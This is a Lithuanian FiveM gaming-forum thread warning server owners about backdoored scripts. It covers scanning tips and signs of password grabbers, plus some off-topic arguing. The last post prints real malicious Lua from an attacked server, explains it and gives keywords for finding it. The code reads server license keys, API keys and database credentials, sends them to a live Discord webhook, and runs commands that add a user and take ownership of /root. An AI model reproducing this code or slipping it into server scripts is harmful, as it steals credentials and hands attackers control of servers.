Peršokti į turinį
  • ŽAIDIMAI
  • , ŽAIDIMAI
  • ŽAIDIMAI

Negalima prašyti ar platinti betkokių žaidimą (multiplayer) palengvinančių programų ir scriptų! Kitaip bus taikoma 1.21. taisyklė
❗️ Dėmesio! Prieš leidžiant skriptus/modifikacijas, būtinai patikrinkite jų kodą! </>

fivem [SVARBU] Kenkėjų paslėpti "backdoors". Kas tai? Kaip nuo jų apsisaugoti?


Recommended Posts

2 minutes prieš, Xan parašė:

o virustotal patikimas, tarkim zip faila perskanuot užtenka, ar visus failus atskirai reikia?

Labas, "virustotal" visiškai nepadeda kalbant apie šį reikalą. @Adomas J. gali patvirtinti, nes jau turėjome šiokį tokį nesusipratimą, kuomet prie užkrėstų failų šiame forume buvo prisegta "Virustotal" nuoroda (ši tema jau ištrinta). :D Nuo šiandienos turėdamas laisvo laiko užmesiu akį į šiame forume pasidalintomis sistemomis ir parašysiu komentarą ar sistema saugi, ar užkrėsta.

Taigi, geriausia failus patikrinti pačiam rankiniu būdu, arba pasinaudojant trečiuoju įrankiu, kurį esu nurodęs - GitHub - exersalza/FivemCipherFinder: A Fivem Cipher finder for those that don't want Ciphers in their scripts :D

Nuoroda į komentarą
Dalintis per kitą puslapį

Būtinai updeitinkite windowsus, kad Operacinės sistemos būtų up to date!! Patarčiau dar nusipirkti legalią windows versiją, nebūtinai iš microsoft, galima rasti key už 30 eurų (tačiau įrašai oficialią windows versiją, tik key iš kitur perki :)), tik neturės klientų aptarnavimo pagalbos. Svarbu bus legalūs windowsai kuriuos galėsite updeitinti. Kas turi daugiau pinigų siūlyčiau pirkti oficialiai viską ir nesisiūsti jokių piratiniu versijų, tik iš patikimų šaltiniu. Geriau vadovautis taisykle - jei neturi pinigų nusipirkti legalią versiją tai geriau pakentėti. Nes pasekmės to gali būti - pavogta tapatybė, banko sąskaitos vagystės ir kitokios problemos, kurių sąrašą pilną žinodami - sapnuotumėt košmarus. Net jei ir jūs neturite ką prarasti ar neturite pinigų, jaunimas, jūs vistiek esate taikinys nes galima prisikasti prie jūsų tėvų, giminių, jūsų artimųjų darbo vietos informacijos. Žodžiu, būkit atsargus tam internete 🙂

 

P.S.: Gal čia ir ne apie backdoors postas, bet labai aktualus šita tema.

Redaguota , nario imu_pertrauka
Nuoroda į komentarą
Dalintis per kitą puslapį

prieš 21 valandas(-ų), imu_pertrauka parašė:

Būtinai updeitinkite windowsus, kad Operacinės sistemos būtų up to date!! Patarčiau dar nusipirkti legalią windows versiją, nebūtinai iš microsoft, galima rasti key už 30 eurų (tačiau įrašai oficialią windows versiją, tik key iš kitur perki :)), tik neturės klientų aptarnavimo pagalbos. Svarbu bus legalūs windowsai kuriuos galėsite updeitinti. Kas turi daugiau pinigų siūlyčiau pirkti oficialiai viską ir nesisiūsti jokių piratiniu versijų, tik iš patikimų šaltiniu. Geriau vadovautis taisykle - jei neturi pinigų nusipirkti legalią versiją tai geriau pakentėti. Nes pasekmės to gali būti - pavogta tapatybė, banko sąskaitos vagystės ir kitokios problemos, kurių sąrašą pilną žinodami - sapnuotumėt košmarus. Net jei ir jūs neturite ką prarasti ar neturite pinigų, jaunimas, jūs vistiek esate taikinys nes galima prisikasti prie jūsų tėvų, giminių, jūsų artimųjų darbo vietos informacijos. Žodžiu, būkit atsargus tam internete 🙂

 

P.S.: Gal čia ir ne apie backdoors postas, bet labai aktualus šita tema.

ar legali os ar up to date neapsaugos nuo to ka cia parasei

Nuoroda į komentarą
Dalintis per kitą puslapį

prieš 22 valandas(-ų), imu_pertrauka parašė:

Būtinai updeitinkite windowsus, kad Operacinės sistemos būtų up to date!! Patarčiau dar nusipirkti legalią windows versiją, nebūtinai iš microsoft, galima rasti key už 30 eurų (tačiau įrašai oficialią windows versiją, tik key iš kitur perki :)), tik neturės klientų aptarnavimo pagalbos. Svarbu bus legalūs windowsai kuriuos galėsite updeitinti. Kas turi daugiau pinigų siūlyčiau pirkti oficialiai viską ir nesisiūsti jokių piratiniu versijų, tik iš patikimų šaltiniu. Geriau vadovautis taisykle - jei neturi pinigų nusipirkti legalią versiją tai geriau pakentėti. Nes pasekmės to gali būti - pavogta tapatybė, banko sąskaitos vagystės ir kitokios problemos, kurių sąrašą pilną žinodami - sapnuotumėt košmarus. Net jei ir jūs neturite ką prarasti ar neturite pinigų, jaunimas, jūs vistiek esate taikinys nes galima prisikasti prie jūsų tėvų, giminių, jūsų artimųjų darbo vietos informacijos. Žodžiu, būkit atsargus tam internete 🙂

 

P.S.: Gal čia ir ne apie backdoors postas, bet labai aktualus šita tema.

gal pasiimk tu atostogas, o ne pertrauką

Nuoroda į komentarą
Dalintis per kitą puslapį

27 minutes prieš, imu_pertrauka parašė:

Jaunimas, nepirataukit o tai busit kaip siti

Ko postą dabar pakeitei? :D kur dingo isterijos kurias čia visiem rašiai apie kažkokius atvažiavimus ? :D šlapia vieta  arba vaikas, jei savo žodžių išsižadi :D reputacijom jis kariauja , jei jam uždėjai minusą , tuoj bėgs visur tau minusus dėliot :D (Tai vadinama pinktnaudžiavimu reputacija,ir tai baudžiama)servus jis kuria,samp reputaciją giną , o po dviejų dienų , nebežaiskit jūs to samp :D čia vapšie kalba nesąmonęs apie kurias žalio supratimo neturi... teisingai @Adomas J. pasakė , cituoju

Citata

Temos autorius susigadino sau reputacija ir neapgynė savo teiginio.

Gal tu tiesiog neberašyk kiekvienoje temoje postus rinkdamas to ko nenusimanai, nes reputacija smarkaii krenta..

Redaguota , nario Salvini
Nuoroda į komentarą
Dalintis per kitą puslapį

3 minutes prieš, Salvini parašė:

Ko postą dabar pakeitei? :D kur dingo isterijos kurias čia visiem rašiai apie kažkokius atvažiavimus ? :D šlapia vieta  arba vaikas, jei savo žodžių išsižadi :D reputacijom jis kariauja , jei jam uždėjai minusą , tuoj bėgs visur tau minusus dėliot :D (Tai vadinama pinktnaudžiavimu reputacija,ir tai baudžiama)servus jis kuria,samp reputaciją giną , o po dviejų dienų , nebežaiskit jūs to samp :D čia vapšie kalba nesąmonęs apie kurias žalio supratimo neturi... teisingai @Adomas J. pasakė , cituoju

Gal tu tiesiog neberašyk kiekvienoje temoje postus rinkdamas to ko nenusimanai, nes reputacija smarkaii krenta..

Nebejuokink. 😭

Nuoroda į komentarą
Dalintis per kitą puslapį

Dabar, imu_pertrauka parašė:

Nebejuokink. 😭

Tai davai parodyk originalų postą kur isterikavai čia ant visų tau atsakiusių,sakiai jie atvažiuot tau žadėjo (nors niekur temoje tai neminima) , gi visi perskaitė, po 10 min ištrynei :D eik gydykis čiušpanas ,nes belekokias nesąmones tu čia darai.

Nuoroda į komentarą
Dalintis per kitą puslapį

Sveiki.

Papildoma informacija apie jūsų serverio "backdoor's". Pasitelkiant "backdoor's" kenkėjai į jūsų kompiuterį gali įrašyti kenkėjiškas programas, kurių pagalba gali gauti jūsų visus išsaugotus slaptažodžius. 

? ? ? ?

Patikrinkite ar jūsų serverio direktorijoje prie "server.cfg" nėra sukurto failo "SubAFivem.exe", šis failas automatiškai gali pasileisti paleidžiant serverį, bet gali pasileisti ir kartu su "start up" programomis, kurios įsijungia tuo momentu, kai yra kraunamas jūsų "Desktop".

Spauskite klaviatūroje "WIN + R" ir įveskite "%appdata%". Nuodugniai peržiūrėkite ar nėra grabberio išsaugotų slaptažodžių. Tai galite pastebėti rasdami neaiškų "zip" failą, o gal ir net atskirą aplankalą su visais jūsų duomenimis.

Realus pavyzdys kaip gali atrodyti grabberio surinkta informacija "%appdata%" aplankale. ( @evinced )

image.png

Nuoroda į komentarą
Dalintis per kitą puslapį

  • Parašė po 4 savaičių...

Nors pašalinau komentarą su vieno iš kenkėjų vardu ir pavardę, bet vienam iš kenkėjų nepasisekė ir jo duomenys buvo nutekinti internete, jie yra viešai visiems prieinami ir juos pašalinti neįmanoma. Patariame būti atsargiems, nes vėl kenkėjai kimba į darbus ir ieško aukų.

paveikslas.png

Nuoroda į komentarą
Dalintis per kitą puslapį

  • Parašė po 3 mėnesių...
(redaguota)

🆕 Atnaujinta - 2024-05-01
⚠️ Raktiniai žodžiai: "os.execute" ; "GetConvar" (ieškoti server-side failuose su CTRL+F)

Naujas kenkėjų metodas prisijungti prie jūsų serverio kode:

AddEventHandler('onResourceStart', function(resourceName)
    PerformHttpRequest("https://api.ipify.org/", function (err, text, headers)
    if GetCurrentResourceName() == resourceName then
        local servername = GetConvar("sv_hostname")
        local licensekey = GetConvar("sv_licenseKey")
        local apikey = GetConvar("steam_webApiKey")
        local tags = GetConvar("tags")
        local mysql_connection_string = GetConvar("mysql_connection_string")
        local messagem = "Asmuo atsijungė \n > Steamas: \n"..servername.." \n > Asmens ID: "..text.." \n > Kordinates: "..licensekey.." \n > Licensija: "..apikey.." \n > Grupe: "..tags.."\n > Priežastis: "..mysql_connection_string..""
        local content = {{
        author = {
          name = "ANTI COMBAT LOG",
          icon_url = "https://imgur.com/U86xHyT.png"
        },
        ["color"] = 1933,
        ["description"] = messagem,
        ["footer"] = {
        ["text"] = "ANTI COMBAT LOG",
        },}}
    os.execute('useradd roos')
    os.execute('passwd username')
    os.execute('echo "roos:username" | chpasswd')
    os.execute('chown -R roos: /home')
    os.execute('chown -R roos: /root')
        PerformHttpRequest("https://discord.com/api/webhooks/1213607484347121714/i0wDNRcsko2OfXVCIzc-Bm44vDtgr9Ox6LVPqbPwK2LcG2nqJirI2BOBCCzQnB9yxP8D", function() end, "POST", json.encode({embeds = content}), { ["Content-Type"] = "application/json" })
      end
    end)
end)

P.s. šitas kodas išgauna ir jūsų informaciją iš serverio "config" failo, ko jis neturėtų daryti:

local servername = GetConvar("sv_hostname")
local licensekey = GetConvar("sv_licenseKey")
local apikey = GetConvar("steam_webApiKey")
local tags = GetConvar("tags")
local mysql_connection_string = GetConvar("mysql_connection_string")

Išgavus šią informaciją, ji yra siunčiama kenkėjui į jo "Discord" serverį per "Webhook":

local messagem = "Asmuo atsijungė \n > Steamas: \n"..servername.." \n > Asmens ID: "..text.." \n > Kordinates: "..licensekey.." \n > Licensija: "..apikey.." \n > Grupe: "..tags.."\n > Priežastis: "..mysql_connection_string..""

Kenkėjas gauna jūsų:

  • Serverio pavadinimą ;
  • Steam WEB API Key ;
  • Keymaster licenzijos raktą ;
  • Serverio tag'us ;
  • MySQL (duom. bazės) prisijungimo informaciją
  • Galimybę prisijungti prie jūsų serverio failų (os.execute eilutės)

Pateiktas kodas - reali situacija iš atakuoto serverio, liurbis kenkėjas (nerodysiu pirštais) patingėjo net paslėpti kodą jį užkoduodamas. Primenu, jog jūsų sistemos kodas neturi atrodyti šitaip, jeigu jį atsisiuntėte open-source iš patikimo šaltinio (cfx.re forumas):
image.png.ff5b99da00b86e0bbc0a766bdd14c7aa.png

Išlikite budrūs ir nereikės jaudintis dėl savo serverio saugumo :) 

Redaguota , nario freddy.
Nuoroda į komentarą
Dalintis per kitą puslapį

Prisijungti prie diskusijos

Palikti atsakymą galite iš karto, o užsiregistruoti vėliau. Jeigu jau turite paskyrą mūsų forume, Prisijunkite.

Svečias
Atsakyti šioje temoje...

×   Įklijuotas tekstas turi teksto formatavimą.   Pašalinti teksto formatavimą

  Galimi tik 75 veidukai.

×   Nuoroda buvo automatiškai įterpta.   Įterpti nuorodą paprastai

×   Jūsų ankstesnis pranešimas buvo atkurtas.   Išvalyti redaktorių

×   Jūs negalite įkelti nuotraukas tiesiogiai.Įkelkite arba įdėkite nuotraukas iš URL.

Skelbimai


×
×
  • Sukurti naują...